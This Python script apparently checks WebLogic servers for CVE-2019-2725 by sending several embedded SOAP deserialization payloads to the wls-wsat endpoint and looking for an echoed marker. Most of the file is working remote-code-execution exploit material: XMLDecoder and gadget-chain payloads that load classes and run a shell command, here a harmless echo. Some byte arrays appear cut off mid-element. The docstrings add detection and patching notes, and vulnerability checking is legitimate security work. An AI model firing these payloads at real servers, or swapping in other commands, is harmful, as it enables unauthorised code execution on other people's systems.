# encoding=utf8
import requests
echo_cmd_payload_10271 = """<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls"><string>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</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>echo windowslu^fei linuxlu$1fei test</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
"""
echo_cmd_payload_10_3_6 = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="6857"><void index="0"> <byte>-84</byte></void><void index="1"> <byte>-19</byte></void><void index="3"> <byte>5</byte></void><void index="4"> <byte>115</byte></void><void index="5"> <byte>114</byte></void><void index="7"> <byte>23</byte></void><void index="8"> <byte>106</byte></void><void index="9"> <byte>97</byte></void><void index="10"> <byte>118</byte></void><void index="11"> <byte>97</byte></void><void index="12"> <byte>46</byte></void><void index="13"> <byte>117</byte></void><void index="14"> <byte>116</byte></void><void index="15"> <byte>105</byte></void><void index="16"> <byte>108</byte></void><void index="17"> <byte>46</byte></void><void index="18"> <byte>76</byte></void><void index="19"> <byte>105</byte></void><void index="20"> <byte>110</byte></void><void index="21"> <byte>107</byte></void><void index="22"> <byte>101</byte></void><void index="23"> <byte>100</byte></void><void index="24"> <byte>72</byte></void><void index="25"> <byte>97</byte></void><void index="26"> <byte>115</byte></void><void index="27"> <byte>104</byte></void><void index="28"> <byte>83</byte></void><void index="29"> <byte>101</byte></void><void index="30"> <byte>116</byte></void><void index="31"> <byte>-40</byte></void><void index="32"> <byte>108</byte></void><void index="33"> <byte>-41</byte></void><void index="34"> <byte>90</byte></void><void index="35"> <byte>-107</byte></void><void index="36"> <byte>-35</byte></void><void index="37"> <byte>42</byte></void><void index="38"> <byte>30</byte></void><void index="39"> <byte>2</byte></void><void index="42"> <byte>120</byte></void><void index="43"> <byte>114</byte></void><void index="45"> <byte>17</byte></void><void index="46"> <byte>106</byte></void><void index="47"> <byte>97</byte></void><void index="48"> <byte>118</byte></void><void index="49"> <byte>97</byte></void><void index="50"> <byte>46</byte></void><void index="51"> <byte>117</byte></void><void index="52"> <byte>116</byte></void><void index="53"> 
<byte>105</byte></void><void index="54"> <byte>108</byte></void><void index="55"> <byte>46</byte></void><void index="56"> <byte>72</byte></void><void index="57"> <byte>97</byte></void><void index="58"> <byte>115</byte></void><void index="59"> <byte>104</byte></void><void index="60"> <byte>83</byte></void><void index="61"> <byte>101</byte></void><void index="62"> <byte>116</byte></void><void index="63"> <byte>-70</byte></void><void index="64"> <byte>68</byte></void><void index="65"> <byte>-123</byte></void><void index="66"> <byte>-107</byte></void><void index="67"> <byte>-106</byte></void><void index="68"> <byte>-72</byte></void><void index="69"> <byte>-73</byte></void><void index="70"> <byte>52</byte></void><void index="71"> <byte>3</byte></void><void index="74"> <byte>120</byte></void><void index="75"> <byte>112</byte></void><void index="76"> <byte>119</byte></void><void index="77"> <byte>12</byte></void><void index="81"> <byte>16</byte></void><void index="82"> <byte>63</byte></void><void index="83"> <byte>64</byte></void><void index="89"> <byte>2</byte></void><void index="90"> <byte>115</byte></void><void index="91"> <byte>114</byte></void><void index="93"> <byte>58</byte></void><void index="94"> <byte>99</byte></void><void index="95"> <byte>111</byte></void><void index="96"> <byte>109</byte></void><void index="97"> <byte>46</byte></void><void index="98"> <byte>115</byte></void><void index="99"> <byte>117</byte></void><void index="100"> <byte>110</byte></void><void index="101"> <byte>46</byte></void><void index="102"> <byte>111</byte></void><void index="103"> <byte>114</byte></void><void index="104"> <byte>103</byte></void><void index="105"> <byte>46</byte></void><void index="106"> <byte>97</byte></void><void index="107"> <byte>112</byte></void><void index="108"> <byte>97</byte></void><void index="109"> <byte>99</byte></void><void index="110"> <byte>104</byte></void><void index="111"> <byte>101</byte></void><void index="112"> <byte>46</byte></void><void 
index="113"> <byte>120</byte></void><void index="114"> <byte>97</byte></void><void index="115"> <byte>108</byte
</void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
"""
echo_cmd_payload_10_3_6_2 = """<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<array method="forName">
<string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
<void>
<array class="byte" length="6862"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void><void index="39"><byte>2</byte></void><void index="42"><byte>120</byte></void><void index="43"><byte>114</byte></void><void index="45"><byte>17</byte></void><void index="46"><byte>106</byte></void><void index="47"><byte>97</byte></void><void index="48"><byte>118</byte></void><void index="49"><byte>97</byte></void><void index="50"><byte>46</byte></void><void index="51"><byte>117</byte></void><void index="52"><byte>116</byte></void><void index="53"><byte>105</byte></void><void 
index="54"><byte>108</byte></void><void index="55"><byte>46</byte></void><void index="56"><byte>72</byte></void><void index="57"><byte>97</byte></void><void index="58"><byte>115</byte></void><void index="59"><byte>104</byte></void><void index="60"><byte>83</byte></void><void index="61"><byte>101</byte></void><void index="62"><byte>116</byte></void><void index="63"><byte>-70</byte></void><void index="64"><byte>68</byte></void><void index="65"><byte>-123</byte></void><void index="66"><byte>-107</byte></void><void index="67"><byte>-106</byte></void><void index="68"><byte>-72</byte></void><void index="69"><byte>-73</byte></void><void index="70"><byte>52</byte></void><void index="71"><byte>3</byte></void><void index="74"><byte>120</byte></void><void index="75"><byte>112</byte></void><void index="76"><byte>119</byte></void><void index="77"><byte>12</byte></void><void index="81"><byte>16</byte></void><void index="82"><byte>63</byte></void><void index="83"><byte>64</byte></void><void index="89"><byte>2</byte></void><void index="90"><byte>115</byte></void><void index="91"><byte>114</byte></void><void index="93"><byte>58</byte></void><void index="94"><byte>99</byte></void><void index="95"><byte>111</byte></void><void index="96"><byte>109</byte></void><void index="97"><byte>46</byte></void><void index="98"><byte>115</byte></void><void index="99"><byte>117</byte></void><void index="100"><byte>110</byte></void><void index="101"><byte>46</byte></void><void index="102"><byte>111</byte></void><void index="103"><byte>114</byte></void><void index="104"><byte>103</byte></void><void index="105"><byte>46</byte></void><void index="106"><byte>97</byte></void><void index="107"><byte>112</byte></void><void index="108"><byte>97</byte></void><void index="109"><byte>99</byte></void><void index="110"><byte>104</byte></void><void index="111"><byte>101</byte></void><void index="112"><byte>46</byte></void><void index="113"><byte>120</byte></void><void index="114"><byte>97</byte></void><void 
index="115"><byte>108</byte></void><void index="116"><byte>97</byte></void><void index="117"><byte>110</byte></void><void index
</void>
</array>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
echo_cmd_payload_12_1_3 = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<class><string>org.slf4j.ext.EventData</string>
<void>
<string>
<java>
<void class="sun.misc.BASE64Decoder">
<void method="decodeBuffer" id="byte_arr"> <string>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</string>
</void>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>ResultBaseExec</string>
<object idref="byte_arr"></object>
<void method="newInstance">
<void method="do_exec" id="result">
<string>echo windowslu^fei linuxlu$1fei test</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork" id="current_work">
<void method="getClass">
<void method="getDeclaredField">
<string>connectionHandler</string>
<void method="setAccessible"><boolean>true</boolean></void>
<void method="get">
<object idref="current_work"></object>
<void method="getServletRequest">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</void>
</void>
</void>
</void>
</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
"""
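def _probe_and_report(vul_url, payload, label, headers, timeout):
    """Post one payload and print whether a shell-expanded marker came back.

    Args:
        vul_url: Full URL of the endpoint being checked.
        payload: SOAP/XML request body to send.
        label: Payload name used in the printed result line.
        headers: Request headers sent with the payload.
        timeout: Seconds to wait for the server before giving up.
    """
    try:
        # verify=False disables TLS certificate validation (kept from the
        # original); the response is therefore not authenticated and requests
        # will emit an InsecureRequestWarning.
        rsp = requests.post(vul_url, data=payload, verify=False,
                            headers=headers, timeout=timeout)
    except requests.RequestException as err:
        # A transport failure says nothing about the target's patch state, so
        # it is reported as an error rather than as "not vulnerable".
        print("[!]请求失败 {},无法判断: {}".format(label, err))
        return

    body = rsp.text
    # The probe command is `echo windowslu^fei linuxlu$1fei test`: cmd.exe
    # drops the `^` and a POSIX shell expands the empty `$1`, so the joined
    # markers only appear when a shell on the server processed the string,
    # not when the request text is merely reflected back.
    if "windowslufei" in body:
        print("[*]存在漏洞 {},在windows".format(label))
    elif "linuxlufei" in body:
        print("[*]存在漏洞 {},在linux".format(label))
    else:
        print("[-]不存在漏洞 {},在windows/linux".format(label))


def attack(url, timeout=10):
    """Check a WebLogic server for CVE-2019-2725 using live echo payloads.

    Each payload is POSTed to ``<url>/wls-wsat/CoordinatorPortType11`` and the
    response body is searched for a marker that is only produced when the
    embedded ``echo`` command was executed. A positive result therefore means
    a command ran on the server, not just that a version string matched.

    On the wire this looks like a ``text/xml`` POST to the wls-wsat path whose
    SOAP ``WorkContext`` header carries a ``<java>`` document, together with
    the non-standard ``lfcmd`` request header; those are the traits to match
    when reviewing proxy or WAF logs. A host that reports the marker needs the
    vendor fix for CVE-2019-2725, and the wls-wsat path should not be
    reachable from untrusted networks.

    Args:
        url: Base URL of the server, e.g. scheme://host:port (a trailing
            slash is tolerated).
        timeout: Seconds to wait for each response. Without a timeout an
            unresponsive host would block the check indefinitely.

    Returns:
        None. Results are printed, one line per payload.
    """
    print('[+]开始检测-Weblogic-CVE-2019-2725。[+]')
    vul_url = url.rstrip('/') + '/wls-wsat/CoordinatorPortType11'
    headers = {
        'Content-Type':'text/xml',
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
        'SOAPAction':'',
        'lfcmd':'echo windowslu^fei linuxlu$1fei test'
    }

    # The "10271" command-echo payload (echo_cmd_payload_10271) was disabled
    # by the author and stays disabled here.
    probes = (
        # jdk7u21 command echo
        (echo_cmd_payload_10_3_6, "echo_cmd_payload_10_3_6"),
        (echo_cmd_payload_10_3_6_2, "echo_cmd_payload_10_3_6.2"),
        # EventData
        (echo_cmd_payload_12_1_3, "echo_cmd_payload_12_1_3"),
    )
    # No exit() on a hit: the caller decides what to do next, and every
    # payload's result line is printed exactly once.
    for payload, label in probes:
        _probe_and_report(vul_url, payload, label, headers, timeout)

    print('[+]检测结束-Weblogic-CVE-2019-2725。[+]')
    print('\n')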
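if __name__ == '__main__':
    # attack() requires the base URL of the server to check; read it from the
    # command line and stop with a usage message when it is missing instead of
    # failing with a TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit("usage: {} <base-url>".format(sys.argv[0]))
    attack(sys.argv[1])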